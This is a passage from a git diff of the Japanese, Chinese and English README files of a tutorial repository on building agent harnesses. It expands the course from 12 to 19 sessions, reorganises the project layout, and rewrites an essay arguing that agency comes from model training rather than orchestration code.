は元々賢い。Harness が Claude に手と目とワークスペースを与えた。 -これが Claude Code が理想的な教材である理由だ:**モデルを信頼し、工学的努力を Harness に集中させるとどうなるかを示している。** このリポジトリの各セッション(s01-s12)は Claude Code アーキテクチャから一つの Harness メカニズムをリバースエンジニアリングする。終了時には、Claude Code の仕組みだけでなく、あらゆるドメインのあらゆる Agent に適用される Harness 工学の普遍的原則を理解している。 +これが Claude Code が理想的な教材である理由だ:**モデルを信頼し、工学的努力を Harness に集中させるとどうなるかを示している。** このリポジトリの各セッション(s01-s19)は Claude Code アーキテクチャから一つの Harness メカニズムをリバースエンジニアリングする。終了時には、Claude Code の仕組みだけでなく、あらゆるドメインのあらゆる Agent に適用される Harness 工学の普遍的原則を理解している。 教訓は「Claude Code をコピーせよ」ではない。教訓は:**最高の Agent プロダクトは、自分の仕事が Harness であって Intelligence ではないと理解しているエンジニアが作る。** @@ -159,32 +159,46 @@ Claude Code = 一つの agent loop Agent を特定ドメインで効果的にする Harness -- の作り方を教える。 ``` -**12 の段階的セッション、シンプルなループから分離された自律実行まで。** +**19 の段階的セッション、シンプルなループから外付けプラグインまで。** **各セッションは 1 つの Harness メカニズムを追加する。各メカニズムには 1 つのモットーがある。** > **s01**   *"One loop & Bash is all you need"* — 1つのツール + 1つのループ = エージェント > > **s02**   *"ツールを足すなら、ハンドラーを1つ足すだけ"* — ループは変わらない。新ツールは dispatch map に登録するだけ > -> **s03**   *"計画のないエージェントは行き当たりばったり"* — まずステップを書き出し、それから実行 +> **s03**   *"まず境界を決め、それから自由を与える"* — 権限パイプラインが承認の要否を判断する > -> **s04**   *"大きなタスクを分割し、各サブタスクにクリーンなコンテキストを"* — サブエージェントは独立した messages[] を使い、メイン会話を汚さない +> **s04**   *"ループの外にフックし、ループは書き換えない"* — フックがツール実行前後に拡張ロジックを注入 > -> **s05**   *"必要な知識を、必要な時に読み込む"* — system prompt ではなく tool_result で注入 +> **s05**   *"計画のないエージェントは行き当たりばったり"* — まずステップを書き出し、それから実行 > -> **s06**   *"コンテキストはいつか溢れる、空ける手段が要る"* — 3層圧縮で無限セッションを実現 +> **s06**   *"大きなタスクを分割し、各サブタスクにクリーンなコンテキストを"* — サブエージェントは独立した messages[] を使い、メイン会話を汚さない > -> **s07**   *"大きな目標を小タスクに分解し、順序付けし、ディスクに記録する"* — ファイルベースのタスクグラフ、マルチエージェント協調の基盤 +> **s07**   *"必要な知識を、必要な時に読み込む"* — system prompt ではなく tool_result で注入 > -> **s08**   *"遅い操作はバックグラウンドへ、エージェントは次を考え続ける"* — デーモンスレッドがコマンド実行、完了後に通知を注入 +> **s08**   *"コンテキストはいつか溢れる、空ける手段が要る"* — 4層圧縮、安い方から先に実行 > -> **s09**   *"一人で終わらないなら、チームメイトに任せる"* — 永続チームメイト + 非同期メールボックス +> **s09**   *"覚えるべきことを覚え、忘れるべきことを忘れる"* — 3つのサブシステム:選択、抽出、整理 > -> **s10**   *"チームメイト間には統一の通信ルールが必要"* — 1つの request-response パターンが全交渉を駆動 +> **s10**   *"プロンプトは実行時に組み立てる、ハードコードではない"* — セクション分割 + オンデマンド連結 > -> **s11**   *"チームメイトが自らボードを見て、仕事を取る"* — リーダーが逐一割り振る必要はない +> **s11**   *"エラーは終わりではない、リトライの始まりだ"* — トークン拡張、コンテキスト圧縮、モデル切替 > -> **s12**   *"各自のディレクトリで作業し、互いに干渉しない"* — タスクは目標を管理、worktree はディレクトリを管理、IDで紐付け +> **s12**   *"大きな目標を小タスクに分解し、順序付けし、ディスクに記録する"* — ファイルベースのタスクグラフ、マルチエージェント協調の基盤 +> +> **s13**   *"遅い操作はバックグラウンドへ、エージェントは次を考え続ける"* — バックグラウンドスレッドがコマンド実行、完了後に通知を注入 +> +> **s14**   *"スケジュールで発火、人間の起動は不要"* — cron スケジューリング、永続 or セッション限定 +> +> **s15**   *"一人で終わらないなら、チームメイトに任せる"* — 永続チームメイト + 非同期メールボックス +> +> **s16**   *"チームメイト間には統一の通信ルールが必要"* — 1つの request-response パターンが全交渉を駆動 +> +> **s17**   *"チームメイトが自らボードを見て、仕事を取る"* — リーダーが逐一割り振る必要はない +> +> **s18**   *"各自のディレクトリで作業し、互いに干渉しない"* — タスクは目標を管理、worktree はディレクトリを管理、IDで紐付け +> +> **s19**   *"能力不足? MCP でプラグイン"* — マルチトランスポート、チャネルルーティング、ツールプール統合 --- @@ -238,9 +252,9 @@ cd learn-claude-code pip install -r requirements.txt cp .env.example .env # .env を編集して ANTHROPIC_API_KEY を入力 -python agents/s01_agent_loop.py # ここから開始 -python agents/s12_worktree_task_isolation.py # 全セッションの到達点 -python agents/s_full.py # 総括: 全メカニズム統合 +python s01_agent_loop/code.py # ここから開始 — 1ループ + bash +python s08_context_compact/code.py # コンテキスト圧縮(最複雑章) +python s_full/code.py # 総括: 全19メカニズム統合 ``` ### Web プラットフォーム @@ -251,75 +265,71 @@ python agents/s_full.py # 総括: 全メカニズム統合 cd web && npm install && npm run dev # http://localhost:3000 ``` -## 学習パス - -``` -フェーズ1: ループ フェーズ2: 計画と知識 -================== ============================== -s01 エージェントループ [1] s03 TodoWrite [5] - while + stop_reason TodoManager + nag リマインダー - | | - +-> s02 Tool Use [4] s04 サブエージェント [5] - dispatch map: name->handler 子ごとに新しい messages[] - | - s05 Skills [5] - SKILL.md を tool_result で注入 - | - s06 Context Compact [5] - 3層コンテキスト圧縮 - -フェーズ3: 永続化 フェーズ4: チーム -================== ===================== -s07 タスクシステム [8] s09 エージェントチーム [9] - ファイルベース CRUD + 依存グラフ チームメイト + JSONL メールボックス - | | -s08 バックグラウンドタスク [6] s10 チームプロトコル [12] - デーモンスレッド + 通知キュー シャットダウン + プラン承認 FSM - | - s11 自律エージェント [14] - アイドルサイクル + 自動クレーム - | - s12 Worktree 分離 [16] - タスク調整 + 必要時の分離実行レーン - - [N] = ツール数 -``` +## 5つの段階 + +| 段階 | セッション | 構築するもの | +|---|---|---| +| **ツールパイプライン** | `s01-s04` | loop → dispatch → permission → hooks | +| **シングルエージェント機能** | `s05-s08` | planning → subagent → skill → context compact | +| **知識と回復力** | `s09-s11` | memory → prompt assembly → error recovery | +| **永続的作業** | `s12-s14` | task graph → background → cron | +| **マルチエージェント基盤** | `s15-s19` | teams → protocols → autonomy → worktree → MCP | + +## 全セッション + +| セッション | トピック | キーコンセプト | +|---|---|---| +| [s01](./s01_agent_loop/) | Agent Loop | `messages` / `while True` / `stop_reason` | +| [s02](./s02_tool_use/) | Tool Use | `TOOL_HANDLERS` / dispatch map / 並行性 | +| [s03](./s03_permission/) | Permission | `PermissionRule` / 承認パイプライン | +| [s04](./s04_hooks/) | Hooks | `PreToolUse` / `PostToolUse` / 拡張ポイント | +| [s05](./s05_todo_write/) | TodoWrite | `TodoItem` / 計画してから実行 | +| [s06](./s06_subagent/) | Subagent | `fresh messages[]` / コンテキスト分離 | +| [s07](./s07_skill_loading/) | Skill Loading | `SkillManifest` / オンデマンド注入 | +| [s08](./s08_context_compact/) | Context Compact | snip / micro / budget / auto 4層圧縮 | +| [s09](./s09_memory/) | Memory | selection / extraction / consolidation | +| [s10](./s10_system_prompt/) | System Prompt | ランタイム組立 / セクション連結 | +| [s11](./s11_error_recovery/) | Error Recovery | token 拡張 / fallback モデル / リトライ戦略 | +| [s12](./s12_task_system/) | Task System | `TaskRecord` / `blockedBy` / ディスク永続化 | +| [s13](./s13_background_tasks/) | Background Tasks | スレッド実行 / 通知キュー | +| [s14](./s14_cron_scheduler/) | Cron Scheduler | 永続スケジューリング / セッション限定トリガー | +| [s15](./s15_agent_teams/) | Agent Teams | `MessageBus` / 受信箱 / 権限バブリング | +| [s16](./s16_team_protocols/) | Team Protocols | シャットダウンハンドシェイク / プラン承認 | +| [s17](./s17_autonomous_agents/) | Autonomous Agents | アイドルサイクル / 自動クレーム | +| [s18](./s18_worktree_isolation/) | Worktree Isolation | `WorktreeRecord` / タスク-ディレクトリ紐付け | +| [s19](./s19_mcp_plugin/) | MCP Plugin | マルチトランスポート / チャネルルーティング / ツールプール統合 | +| [s_full](./s_full/) | 総括 | s01-s19 全メカニズム統合 | ## プロジェクト構成 ``` learn-claude-code/ -| -|-- agents/ # Python リファレンス実装 (s01-s12 + s_full 総括) -|-- docs/{en,zh,ja}/ # メンタルモデル優先のドキュメント (3言語) -|-- web/ # インタラクティブ学習プラットフォーム (Next.js) -|-- skills/ # s05 の Skill ファイル -+-- .github/workflows/ci.yml # CI: 型チェック + ビルド + s01_agent_loop/ # セッションごとに1フォルダ + README.md # 中国語ソース(完全なナラティブ) + README.en.md # 英語訳 + README.ja.md # 日本語訳 + code.py # 単体実行可能なコード + images/ # SVG ダイアグラム + s02_tool_use/ + ... + s19_mcp_plugin/ + s_full/ # 総括 + agents/ # フラットコピー、python agents/sXX.py でクイック実行 + skills/ # s07 で使用するスキルファイル + docs/ # 旧バージョン(アーカイブ) + web/ # Web 学習プラットフォーム + tests/ + +--- + ``` + -## ドキュメント - -メンタルモデル優先: 問題、解決策、ASCII図、最小限のコード。 -[English](./docs/en/) | [中文](./docs/zh/) | [日本語](./docs/ja/) - -| セッション | トピック | モットー | -|-----------|---------|---------| -| [s01](./docs/ja/s01-the-agent-loop.md) | エージェントループ | *One loop & Bash is all you need* | -| [s02](./docs/ja/s02-tool-use.md) | Tool Use | *ツールを足すなら、ハンドラーを1つ足すだけ* | -| [s03](./docs/ja/s03-todo-write.md) | TodoWrite | *計画のないエージェントは行き当たりばったり* | -| [s04](./docs/ja/s04-subagent.md) | サブエージェント | *大きなタスクを分割し、各サブタスクにクリーンなコンテキストを* | -| [s05](./docs/ja/s05-skill-loading.md) | Skills | *必要な知識を、必要な時に読み込む* | -| [s06](./docs/ja/s06-context-compact.md) | Context Compact | *コンテキストはいつか溢れる、空ける手段が要る* | -| [s07](./docs/ja/s07-task-system.md) | タスクシステム | *大きな目標を小タスクに分解し、順序付けし、ディスクに記録する* | -| [s08](./docs/ja/s08-background-tasks.md) | バックグラウンドタスク | *遅い操作はバックグラウンドへ、エージェントは次を考え続ける* | -| [s09](./docs/ja/s09-agent-teams.md) | エージェントチーム | *一人で終わらないなら、チームメイトに任せる* | -| [s10](./docs/ja/s10-team-protocols.md) | チームプロトコル | *チームメイト間には統一の通信ルールが必要* | -| [s11](./docs/ja/s11-autonomous-agents.md) | 自律エージェント | *チームメイトが自らボードを見て、仕事を取る* | -| [s12](./docs/ja/s12-worktree-task-isolation.md) | Worktree + タスク分離 | *各自のディレクトリで作業し、互いに干渉しない* | +## 次のステップ -- 理解から出荷へ ## 次のステップ -- 理解から出荷へ -12 セッションを終えれば、Harness 工学の内部構造を完全に理解している。その知識を活かす 2 つの方法: +19 セッションを終えれば、Harness 工学の内部構造を完全に理解している。その知識を活かす 2 つの方法: ### Kode Agent CLI -- オープンソース Coding Agent CLI diff --git a/README-zh.md b/README-zh.md index 9ed73ef30..df3033d69 100644 --- a/README-zh.md +++ b/README-zh.md @@ -106,7 +106,7 @@ Claude Code = 一个 agent loop 就这些。这就是全部架构。每一个组件都是 harness 机制 -- 为 agent 构建的栖居世界的一部分。Agent 本身呢?是 Claude。一个模型。由 Anthropic 在人类推理和代码的全部广度上训练而成。Harness 没有让 Claude 变聪明。Claude 本来就聪明。Harness 给了 Claude 双手、双眼和一个工作空间。 -这就是 Claude Code 作为教学标本的意义:**它展示了当你信任模型、把工程精力集中在 harness 上时会发生什么。** 本仓库的每一个课程(s01-s12)都在逆向工程 Claude Code 架构中的一个 harness 机制。学完之后,你理解的不只是 Claude Code 怎么工作,而是适用于任何领域、任何 agent 的 harness 工程通用原则。 +这就是 Claude Code 作为教学标本的意义:**它展示了当你信任模型、把工程精力集中在 harness 上时会发生什么。** 本仓库的每一个课程(s01-s19)都在逆向工程 Claude Code 架构中的一个 harness 机制。学完之后,你理解的不只是 Claude Code 怎么工作,而是适用于任何领域、任何 agent 的 harness 工程通用原则。 启示不是 "复制 Claude Code"。启示是:**最好的 agent 产品,出自那些明白自己的工作是 harness 而非 intelligence 的工程师之手。** @@ -159,32 +159,46 @@ Claude Code = 一个 agent loop 让 agent 在特定领域高效工作的 harness。 ``` -**12 个递进式课程, 从简单循环到隔离化的自治执行。** +**19 个递进式课程, 从简单循环到外接插件。** **每个课程添加一个 harness 机制。每个机制有一句格言。** > **s01**   *"One loop & Bash is all you need"* — 一个工具 + 一个循环 = 一个 Agent > > **s02**   *"加一个工具, 只加一个 handler"* — 循环不用动, 新工具注册进 dispatch map 就行 > -> **s03**   *"没有计划的 agent 走哪算哪"* — 先列步骤再动手, 完成率翻倍 +> **s03**   *"先划边界, 再给自由"* — 权限管线决定哪些操作需要审批 > -> **s04**   *"大任务拆小, 每个小任务干净的上下文"* — Subagent 用独立 messages[], 不污染主对话 +> **s04**   *"挂在循环上, 不写进循环里"* — 钩子在工具执行前后注入扩展逻辑 > -> **s05**   *"用到什么知识, 临时加载什么知识"* — 通过 tool_result 注入, 不塞 system prompt +> **s05**   *"没有计划的 agent 走哪算哪"* — 先列步骤再动手, 完成率翻倍 > -> **s06**   *"上下文总会满, 要有办法腾地方"* — 三层压缩策略, 换来无限会话 +> **s06**   *"大任务拆小, 每个小任务干净的上下文"* — Subagent 用独立 messages[], 不污染主对话 > -> **s07**   *"大目标要拆成小任务, 排好序, 记在磁盘上"* — 文件持久化的任务图, 为多 agent 协作打基础 +> **s07**   *"用到时再加载, 别全塞 prompt 里"* — 通过 tool_result 注入, 不塞 system prompt > -> **s08**   *"慢操作丢后台, agent 继续想下一步"* — 后台线程跑命令, 完成后注入通知 +> **s08**   *"上下文总会满, 要有办法腾地方"* — 四层压缩策略, 便宜的先跑贵的后跑 > -> **s09**   *"任务太大一个人干不完, 要能分给队友"* — 持久化队友 + 异步邮箱 +> **s09**   *"记住该记的, 忘掉该忘的"* — 三个子系统: 筛选、提取、整理 > -> **s10**   *"队友之间要有统一的沟通规矩"* — 一个 request-response 模式驱动所有协商 +> **s10**   *"prompt 是组装出来的, 不是写死的"* — 分段 + 按需拼接 > -> **s11**   *"队友自己看看板, 有活就认领"* — 不需要领导逐个分配, 自组织 +> **s11**   *"错误不是终点, 是重试的起点"* — 升级 token、压缩上下文、切换模型 > -> **s12**   *"各干各的目录, 互不干扰"* — 任务管目标, worktree 管目录, 按 ID 绑定 +> **s12**   *"大目标拆成小任务, 排好序, 持久化"* — 文件持久化的任务图, 多 agent 协作的基础 +> +> **s13**   *"慢操作丢后台, agent 继续思考"* — 后台线程跑命令, 完成后注入通知 +> +> **s14**   *"定时触发, 不需要人推"* — cron 调度, 持久化或会话级 +> +> **s15**   *"一个搞不定, 组队来"* — 持久化队友 + 异步邮箱 +> +> **s16**   *"队友之间要有约定"* — 一个 request-response 模式驱动所有协商 +> +> **s17**   *"队友自己看板, 有活就认领"* — 不需要领导逐个分配, 自组织 +> +> **s18**   *"各干各的目录, 互不干扰"* — 任务管目标, worktree 管目录, 按 ID 绑定 +> +> **s19**   *"能力不够? 插上 MCP"* — 多传输、通道路由、工具池合并 --- @@ -238,9 +252,9 @@ cd learn-claude-code pip install -r requirements.txt cp .env.example .env # 编辑 .env 填入你的 ANTHROPIC_API_KEY -python agents/s01_agent_loop.py # 从这里开始 -python agents/s12_worktree_task_isolation.py # 完整递进终点 -python agents/s_full.py # 总纲: 全部机制合一 +python s01_agent_loop/code.py # 起点 — 一个循环 + bash +python s08_context_compact/code.py # 上下文压缩(最复杂章) +python s_full/code.py # 总纲: 全部 19 个机制合一 ``` ### Web 平台 @@ -251,75 +265,64 @@ python agents/s_full.py # 总纲: 全部机制合一 cd web && npm install && npm run dev # http://localhost:3000 ``` -## 学习路径 - -``` -第一阶段: 循环 第二阶段: 规划与知识 -================== ============================== -s01 Agent Loop [1] s03 TodoWrite [5] - while + stop_reason TodoManager + nag 提醒 - | | - +-> s02 Tool Use [4] s04 Subagent [5] - dispatch map: name->handler 每个 Subagent 独立 messages[] - | - s05 Skills [5] - SKILL.md 通过 tool_result 注入 - | - s06 Context Compact [5] - 三层 Context Compact - -第三阶段: 持久化 第四阶段: 团队 -================== ===================== -s07 Task System [8] s09 Agent Teams [9] - 文件持久化 CRUD + 依赖图 队友 + JSONL 邮箱 - | | -s08 Background Tasks [6] s10 Team Protocols [12] - 守护线程 + 通知队列 关机 + 计划审批 FSM - | - s11 Autonomous Agents [14] - 空闲轮询 + 自动认领 - | - s12 Worktree Isolation [16] - Task 协调 + 按需隔离执行通道 - - [N] = 工具数量 -``` +## 五个阶段 + +| 阶段 | 章节 | 你在构建什么 | +|---|---|---| +| **工具管线** | `s01-s04` | loop → dispatch → permission → hooks | +| **单 Agent 能力** | `s05-s08` | planning → subagent → skill → context compact | +| **知识与韧性** | `s09-s11` | memory → prompt assembly → error recovery | +| **持久化工作** | `s12-s14` | task graph → background → cron | +| **多 Agent 平台** | `s15-s19` | teams → protocols → autonomy → worktree → MCP | + +## 全部章节 + +| 章节 | 主题 | 关键概念 | +|---|---|---| +| [s01](./s01_agent_loop/) | Agent Loop | `messages` / `while True` / `stop_reason` | +| [s02](./s02_tool_use/) | Tool Use | `TOOL_HANDLERS` / dispatch map / 并发 | +| [s03](./s03_permission/) | Permission | `PermissionRule` / 审批管线 | +| [s04](./s04_hooks/) | Hooks | `PreToolUse` / `PostToolUse` / 扩展点 | +| [s05](./s05_todo_write/) | TodoWrite | `TodoItem` / 先计划后执行 | +| [s06](./s06_subagent/) | Subagent | `fresh messages[]` / 上下文隔离 | +| [s07](./s07_skill_loading/) | Skill Loading | `SkillManifest` / 按需注入 | +| [s08](./s08_context_compact/) | Context Compact | snip / micro / budget / auto 四层压缩 | +| [s09](./s09_memory/) | Memory | selection / extraction / consolidation | +| [s10](./s10_system_prompt/) | System Prompt | 运行时组装 / 分段拼接 | +| [s11](./s11_error_recovery/) | Error Recovery | token 升级 / fallback 模型 / 重试策略 | +| [s12](./s12_task_system/) | Task System | `TaskRecord` / `blockedBy` / 磁盘持久化 | +| [s13](./s13_background_tasks/) | Background Tasks | 线程执行 / 通知队列 | +| [s14](./s14_cron_scheduler/) | Cron Scheduler | 持久化调度 / 会话级触发 | +| [s15](./s15_agent_teams/) | Agent Teams | `MessageBus` / 收件箱 / 权限冒泡 | +| [s16](./s16_team_protocols/) | Team Protocols | 关机握手 / 计划审批 | +| [s17](./s17_autonomous_agents/) | Autonomous Agents | 空闲循环 / 自动认领 | +| [s18](./s18_worktree_isolation/) | Worktree Isolation | `WorktreeRecord` / 任务-目录绑定 | +| [s19](./s19_mcp_plugin/) | MCP Plugin | 多传输 / 通道路由 / 工具池合并 | +| [s_full](./s_full/) | 总纲 | s01-s19 全部机制合并 | ## 项目结构 ``` learn-claude-code/ -| -|-- agents/ # Python 参考实现 (s01-s12 + s_full 总纲) -|-- docs/{en,zh,ja}/ # 心智模型优先的文档 (3 种语言) -|-- web/ # 交互式学习平台 (Next.js) -|-- skills/ # s05 的 Skill 文件 -+-- .github/workflows/ci.yml # CI: 类型检查 + 构建 -``` - -## 文档 - -心智模型优先: 问题、方案、ASCII 图、最小化代码。 -[English](./docs/en/) | [中文](./docs/zh/) | [日本語](./docs/ja/) - -| 课程 | 主题 | 格言 | -|------|------|------| -| [s01](./docs/zh/s01-the-agent-loop.md) | Agent Loop | *One loop & Bash is all you need* | -| [s02](./docs/zh/s02-tool-use.md) | Tool Use | *加一个工具, 只加一个 handler* | -| [s03](./docs/zh/s03-todo-write.md) | TodoWrite | *没有计划的 agent 走哪算哪* | -| [s04](./docs/zh/s04-subagent.md) | Subagent | *大任务拆小, 每个小任务干净的上下文* | -| [s05](./docs/zh/s05-skill-loading.md) | Skills | *用到什么知识, 临时加载什么知识* | -| [s06](./docs/zh/s06-context-compact.md) | Context Compact | *上下文总会满, 要有办法腾地方* | -| [s07](./docs/zh/s07-task-system.md) | Task System | *大目标要拆成小任务, 排好序, 记在磁盘上* | -| [s08](./docs/zh/s08-background-tasks.md) | Background Tasks | *慢操作丢后台, agent 继续想下一步* | -| [s09](./docs/zh/s09-agent-teams.md) | Agent Teams | *任务太大一个人干不完, 要能分给队友* | -| [s10](./docs/zh/s10-team-protocols.md) | Team Protocols | *队友之间要有统一的沟通规矩* | -| [s11](./docs/zh/s11-autonomous-agents.md) | Autonomous Agents | *队友自己看看板, 有活就认领* | -| [s12](./docs/zh/s12-worktree-task-isolation.md) | Worktree + Task Isolation | *各干各的目录, 互不干扰* | + s01_agent_loop/ # 每章一个文件夹 + README.md # 中文源文档(完整叙事) + README.en.md # 英文译本 + README.ja.md # 日文译本 + code.py # 独立可运行代码 + images/ # SVG 流程图 + s02_tool_use/ + ... + s19_mcp_plugin/ + s_full/ # 总纲 + agents/ # 扁平副本,方便 python agents/sXX.py 快速运行 + skills/ # s07 使用的 skill 文件 + docs/ # 旧版线上文档(已归档) + web/ # Web 教学平台 + tests/ ## 学完之后 -- 从理解到落地 -12 个课程走完, 你已经从内到外理解了 harness 工程的运作原理。两种方式把知识变成产品: +19 个课程走完, 你已经从内到外理解了 harness 工程的运作原理。两种方式把知识变成产品: ### Kode Agent CLI -- 开源 Coding Agent CLI diff --git a/README.md b/README.md index 5d31cf7d1..c3a9e0996 100644 --- a/README.md +++ b/README.md @@ -1,53 +1,52 @@ [English](./README.md) | [中文](./README-zh.md) | [日本語](./README-ja.md) + # Learn Claude Code -- Harness Engineering for Real Agents ## Agency Comes from the Model. An Agent Product = Model + Harness. -Before we talk about code, let's get one thing straight. +Before we write any code, one thing needs to be clear. -**Agency -- the ability to perceive, reason, and act -- comes from model training, not from external code orchestration.** But a working agent product needs both the model and the harness. The model is the driver, the harness is the vehicle. This repo teaches you how to build the vehicle. +**Agency -- the capacity to perceive, reason, and act -- comes from model training, not from external code orchestration.** But a working agent product needs both the model and the harness. The model is the driver. The harness is the vehicle. This repository teaches you how to build the vehicle. ### Where Agency Comes From -At the core of every agent is a neural network -- a Transformer, an RNN, a learned function -- that has been trained, through billions of gradient updates on action-sequence data, to perceive an environment, reason about goals, and take actions. Agency is never granted by the surrounding code. It is learned by the model during training. +At the core of every agent is a neural network -- a Transformer, an RNN, a trained function -- shaped by billions of gradient updates on sequences of perception, reasoning, and action. Agency was never bestowed by the surrounding code. It was learned during training. -Humans are the best example. A biological neural network shaped by millions of years of evolutionary training, perceiving the world through senses, reasoning through a brain, acting through a body. When DeepMind, OpenAI, or Anthropic say "agent," the core of what they mean is always the same thing: **a model that has learned to act, plus the infrastructure that lets it operate in a specific environment.** +Humans are the original proof. A biological neural network, refined by millions of years of evolutionary pressure, perceives the world through senses, reasons through a brain, and acts through a body. When DeepMind, OpenAI, or Anthropic say "agent," they all mean the same core thing: **a model that learned to act through training, plus the infrastructure that lets it operate in a specific environment.** -The proof is written in history: +The historical record is unambiguous: -- **2013 -- DeepMind DQN plays Atari.** A single neural network, receiving only raw pixels and game scores, learned to play 7 Atari 2600 games -- surpassing all prior algorithms and beating human experts on 3 of them. By 2015, the same architecture scaled to [49 games and matched professional human testers](https://www.nature.com/articles/nature14236), published in *Nature*. No game-specific rules. No decision trees. One model, learning from experience. That model was the agent. +- **2013 -- DeepMind DQN plays Atari.** A single neural network, receiving only raw pixels and game scores, learned 7 Atari 2600 games -- surpassing prior algorithms and beating human experts in 3 of them. By 2015, scaled to [49 games at professional tester level](https://www.nature.com/articles/nature14236), published in *Nature*. No game-specific rules. One model, learning from experience. -- **2019 -- OpenAI Five conquers Dota 2.** Five neural networks, having played [45,000 years of Dota 2](https://openai.com/index/openai-five-defeats-dota-2-world-champions/) against themselves in 10 months, defeated **OG** -- the reigning TI8 world champions -- 2-0 on a San Francisco livestream. In a subsequent public arena, the AI won 99.4% of 42,729 games against all comers. No scripted strategies. No meta-programmed team coordination. The models learned teamwork, tactics, and real-time adaptation entirely through self-play. +- **2019 -- OpenAI Five conquers Dota 2.** Five neural networks played [45,000 years of Dota 2 against themselves](https://openai.com/index/openai-five-defeats-dota-2-world-champions/) over 10 months, then defeated **OG** -- the TI8 world champions -- 2-0 in a live match. In the public arena, the AI won 99.4% of 42,729 games. No scripted strategies. Models learned teamwork through self-play. -- **2019 -- DeepMind AlphaStar masters StarCraft II.** AlphaStar [beat professional players 10-1](https://deepmind.google/blog/alphastar-mastering-the-real-time-strategy-game-starcraft-ii/) in a closed-door match, and later achieved [Grandmaster status](https://www.nature.com/articles/d41586-019-03298-6) on European servers -- top 0.15% of 90,000 players. A game with imperfect information, real-time decisions, and a combinatorial action space that dwarfs chess and Go. The agent? A model. Trained. Not scripted. +- **2019 -- DeepMind AlphaStar masters StarCraft II.** AlphaStar [beat a professional player 10-1](https://deepmind.google/blog/alphastar-mastering-the-real-time-strategy-game-starcraft-ii/) in closed matches, then reached [Grandmaster rank](https://www.nature.com/articles/d41586-019-03298-6) on the European server -- top 0.15% of 90,000 players. An incomplete-information, real-time game with a combinatorial action space far exceeding chess or Go. -- **2019 -- Tencent Jueyu dominates Honor of Kings.** Tencent AI Lab's "Jueyu" [defeated KPL professional players](https://www.jiemian.com/article/3371171.html) in a full 5v5 match at the World Champion Cup. In 1v1 mode, pros won only [1 out of 15 games and never survived past 8 minutes](https://developer.aliyun.com/article/851058). Training intensity: one day equaled 440 human years. By 2021, Jueyu surpassed KPL pros across the full hero pool. No handcrafted matchup tables. No scripted compositions. A model that learned the entire game from scratch through self-play. +- **2019 -- Tencent Jueyu dominates Honor of Kings.** Tencent AI Lab's "Jueyu" system [defeated KPL professional players in full 5v5](https://www.jiemian.com/article/3371171.html) at the World Champion Cup semifinal. In 1v1 mode, pros [won just 1 out of 15 matches, lasting under 8 minutes at best](https://developer.aliyun.com/article/851058). Training intensity: one day equaled 440 human years. A model that learned the entire game from scratch through self-play. -- **2024-2025 -- LLM agents reshape software engineering.** Claude, GPT, Gemini -- large language models trained on the entirety of human code and reasoning -- are deployed as coding agents. They read codebases, write implementations, debug failures, coordinate in teams. The architecture is identical to every agent before them: a trained model, placed in an environment, given tools to perceive and act. The only difference is the scale of what they've learned and the generality of the tasks they solve. +- **2024-2025 -- LLM agents reshape software engineering.** Claude, GPT, Gemini -- large language models trained on the full breadth of human code and reasoning -- are deployed as coding agents. They read codebases, write implementations, debug failures, and coordinate as teams. The architecture is identical to every previous agent: a trained model, placed in an environment, given tools for perception and action. -Every one of these milestones points to the same fact: **agency -- the ability to perceive, reason, and act -- is trained, not coded.** But every agent also needed an environment to operate in: the Atari emulator, the Dota 2 client, the StarCraft II engine, the IDE and terminal. The model provides intelligence. The environment provides the action space. Together they form a complete agent. +Every milestone points to the same fact: **Agency -- the ability to perceive, reason, and act -- is trained, not coded.** But every agent also needs an environment to operate in: an Atari emulator, the Dota 2 client, the StarCraft II engine, an IDE and a terminal. The model supplies the intelligence. The environment supplies the action space. Together they form a complete agent. ### What an Agent Is NOT -The word "agent" has been hijacked by an entire cottage industry of prompt plumbing. - -Drag-and-drop workflow builders. No-code "AI agent" platforms. Prompt-chain orchestration libraries. They all share the same delusion: that wiring together LLM API calls with if-else branches, node graphs, and hardcoded routing logic constitutes "building an agent." +The word "agent" has been hijacked by an entire prompt-plumbing industry. -It doesn't. What they build is a Rube Goldberg machine -- an over-engineered, brittle pipeline of procedural rules, with an LLM wedged in as a glorified text-completion node. That is not an agent. That is a shell script with delusions of grandeur. +Drag-and-drop workflow builders. No-code "AI Agent" platforms. Prompt-chain orchestration libraries. They share a single delusion: that stringing LLM API calls together with if-else branches, node graphs, and hardcoded routing logic constitutes "building an agent." -**Prompt plumbing "agents" are the fantasy of programmers who don't train models.** They attempt to brute-force intelligence by stacking procedural logic -- massive rule trees, node graphs, chain-of-prompt waterfalls -- and praying that enough glue code will somehow emergently produce autonomous behavior. It won't. You cannot engineer your way to agency. Agency is learned, not programmed. +It does not. What they produce are Rube Goldberg machines -- over-engineered, brittle, procedural rule pipelines with an LLM wedged in as a glorified text-completion node. That is not an agent. That is a shell script with grandiose pretensions. -Those systems are dead on arrival: fragile, unscalable, fundamentally incapable of generalization. They are the modern resurrection of GOFAI (Good Old-Fashioned AI) -- the symbolic rule systems the field abandoned decades ago, now spray-painted with an LLM veneer. Different packaging, same dead end. +You cannot brute-force intelligence by stacking procedural logic -- sprawling rule trees, node graphs, chained prompt waterfalls -- and praying that enough glue code will spontaneously produce autonomous behavior. It will not. You cannot engineer agency into existence. Agency is learned, not coded. -### The Mind Shift: From "Developing Agents" to Developing Harness +### The Mindshift: From "Building Agents" to Building Harnesses -When someone says "I'm developing an agent," they can only mean one of two things: +When someone says "I am building an agent," they can only mean one of two things: -**1. Training the model.** Adjusting weights through reinforcement learning, fine-tuning, RLHF, or other gradient-based methods. Collecting task-process data -- the actual sequences of perception, reasoning, and action in real domains -- and using it to shape the model's behavior. This is what DeepMind, OpenAI, Tencent AI Lab, and Anthropic do. This is agent development in the truest sense. +**1. Training a model.** Adjusting weights through reinforcement learning, fine-tuning, RLHF, or another gradient-based method. Collecting trajectory data -- real-world sequences of perception, reasoning, and action in a target domain -- and using it to shape the model's behavior. This is what DeepMind, OpenAI, Tencent AI Lab, and Anthropic do. -**2. Building the harness.** Writing the code that gives the model an environment to operate in. This is what most of us do, and it is the focus of this repository. +**2. Building a harness.** Writing the code that gives a model an operational environment. This is what most of us do, and it is the core of this repository. -A harness is everything the agent needs to function in a specific domain: +A harness is everything an agent needs to work in a specific domain: ``` Harness = Tools + Knowledge + Observation + Action Interfaces + Permissions @@ -56,83 +55,55 @@ Harness = Tools + Knowledge + Observation + Action Interfaces + Permissions Knowledge: product docs, domain references, API specs, style guides Observation: git diff, error logs, browser state, sensor data Action: CLI commands, API calls, UI interactions - Permissions: sandboxing, approval workflows, trust boundaries + Permissions: sandbox isolation, approval workflows, trust boundaries ``` The model decides. The harness executes. The model reasons. The harness provides context. The model is the driver. The harness is the vehicle. -**A 